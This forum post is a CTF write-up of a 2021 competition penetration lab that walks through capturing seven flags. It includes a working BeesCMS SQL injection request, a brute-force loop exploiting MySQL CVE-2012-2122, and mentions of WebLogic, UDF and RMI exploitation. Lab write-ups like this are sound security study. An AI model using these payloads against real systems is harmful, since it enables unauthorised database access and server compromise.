历史记录

    清空历史记录
    • 相关的动态
    • 相关的文章
    • 相关的用户
    • 相关的圈子
    • 相关的话题
    注册 登录
    2021极客谷杯决赛渗透靶场1全解
    lazy小远 渗透测试 6889浏览 · 2021-10-27 15:27

    比赛情况

    2021极客谷杯
    Break环节:在Break环节中,参赛选手以攻击者的身份对模拟的企业内网进行内网渗透、内网穿透等操作,获取不同目标服务器的权限。
    靶场1一共7个flag,全部ak

    靶机信息

    地址:1.13.24.8
    端口:80

    flag6

    目录扫描,发现robots.txt

    http://1.13.24.8/robots.txt

    flag6{4177d24e50af8fedb2e9e385cf6eae9e}

    flag7

    访问首页,很明显的beescms,搜索相关漏洞发现存在Beescms_v4.0 sql注入漏洞,直接利用exp,注入得后台用户名密码

    POST /admin/login.php?action=ck_login HTTP/1.1
Host: 1.13.24.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 180
Origin: http://1.13.24.8
Connection: close
Referer: http://1.13.24.8/admin/login.php
Cookie: PHPSESSID=7pa2vqf1pn0ckl8eac208ao610
Upgrade-Insecure-Requests: 1

user=admin'a+and+nd+extractvalue(1,concat(0x7e,(seselectlect+admin_password+f+from+rom+bees_admin+limit+0,1),0x7e))#&password=admin123&code=e82b&submit=true&submit.x=66&submit.y=23


    bs_admin、ae3700364f2111b2cea75d8e19d2331,md5解密得admin、aabbccdd@123

    后台可以直接文件上传getshell,获得flag7


    flag7{faf1a4048d9ede1d4ba9b826b3735d5f}

    flag1

    tmp目录下发现flag

    flag1{c5ed891826097543a066a77c8f627040}

    flag5

    查看ip信息,为172.16.25.10

    搞好代理以后,fscan扫描:

    172.16.25.10:80 open
    172.16.25.1:80 open
    172.16.25.16:3306 open
    172.16.25.30:7001 open
    172.16.25.1:22 open
    [] WebTitle:http://172.16.25.30:7001 code:404 len:1164 title:Error 404--Not Found
    [+] InfoScan:http://172.16.25.30:7001 [weblogic]
    [+] mysql:172.16.25.16:3306:root root123
    [    ] WebTitle:http://172.16.25.1 code:200 len:141 title:BEES浼佷笟缃戠珯绠$悊绯荤粺_浼佷笟寤虹珯绯荤粺_澶栬锤缃戠珯寤鸿_浼佷笟CMS_PHP钀ラ攢浼佷笟缃戠珯妯
    [*] WebTitle:http://172.16.25.10 code:200 len:141 title:BEES浼佷笟缃戠珯绠$悊绯荤粺_浼佷笟寤虹珯绯荤粺_澶栬锤缃戠珯寤鸿_浼佷笟CMS_PHP钀ラ攢浼佷笟缃戠珯妯
    [+] http://172.16.25.30:7001 poc-yaml-weblogic-cve-2020-14750

    发现weblogic,可以直接利用cve-2020-2551


    flag5{419aba19867bbb8de92efd4c66b12926}

    flag3

    尝试[+] mysql:172.16.25.16:3306:root root123 登陆MySQL,发现一直提示密码错误

    奇怪???难道fscan误报了嘛?

    使用goby扫描


    发现mysql:172.16.25.16:3306 存在cve-2012-2122,仔细研究这个cve发现:当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。 也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。

    因此fscan扫描出来的结果应该正好是尝试爆破mysql密码,在爆破到root123 时产生了溢出,因此判断为登录成功

    网上找到exp

    #!/usr/bin/python
import subprocess

while 1:
        subprocess.Popen("mysql -h 172.16.25.16 -u root mysql --password=blah", shell=True).wait()


    成功利用,找到flag3

    flag3{7b87dd51036fe42f2bd83e1911732a65}

    flag4


    给了hint,继续使用udf提权

    提权成功拿到flag4

    flag4{a89b07eebc0f1a5d4de5e4eb78b43ea4}

    flag2

    搞了半天死活找不到flag2,遂做一次内网全端口扫描,发现172.16.25.20开放了32222端口和40909端口,为rmi服务,未授权访问直接连接可以执行命令,获得flag2

    1 人收藏 2 人喜欢 转载 分享
    1 条评论
    某人
    表情
    可输入 255
      发布投稿
    热门文章
    优秀作者
    目录
    先知社区
    本站/app由 Djingoii 提供技术和产品支持